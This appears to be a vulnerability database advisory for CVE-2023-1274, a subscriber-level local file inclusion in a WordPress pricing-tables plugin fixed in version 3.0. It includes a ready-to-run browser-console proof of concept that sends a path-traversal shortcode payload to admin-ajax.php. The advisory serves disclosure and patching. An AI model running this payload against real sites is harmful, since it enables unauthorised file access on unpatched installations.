Pricing Tables For WPBakery Page Builder < 3.0 – Subscriber+ LFI | CVE 2023-1274 | Plugin Vulnerabilities

Description

The plugin does not validate some shortcode attributes before using them to generate paths passed to include function/s, allowing any authenticated users such as subscriber to perform LFI attacks

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[vca_pricing_plans_child vca_pp_styles='/../../../../index']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

pricing-tables-for-wpbakery-page-builder

Fixed in 3.0

References

CVE

Classification

Type

TRAVERSAL

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

267acb2c-1a95-487f-a714-516de05d2b2f

Timeline

Publicly Published

2023-03-22 (about 1 years ago)

Added

2023-03-22 (about 1 years ago)

Last Updated

2023-03-22 (about 1 years ago)

Other

Published

Title

Published

2022-08-22

Title

WPvivid Backup < 0.9.76 - Admin+ Arbitrary File Read

Published

2015-09-30

Title

mTheme Unus < 2.3 - Directory Traversal

Published

2022-03-01

Title

WordPress File Upload < 4.16.3 - Contributor+ Path Traversal to RCE

Published

2022-02-23

Title

WooCommerce < 6.2.1 - Path Traversal via Importers

Published

2021-02-08

Title

Backup by Supsystic <= 2.3.9 - Authenticated Arbitrary File Download and Deletion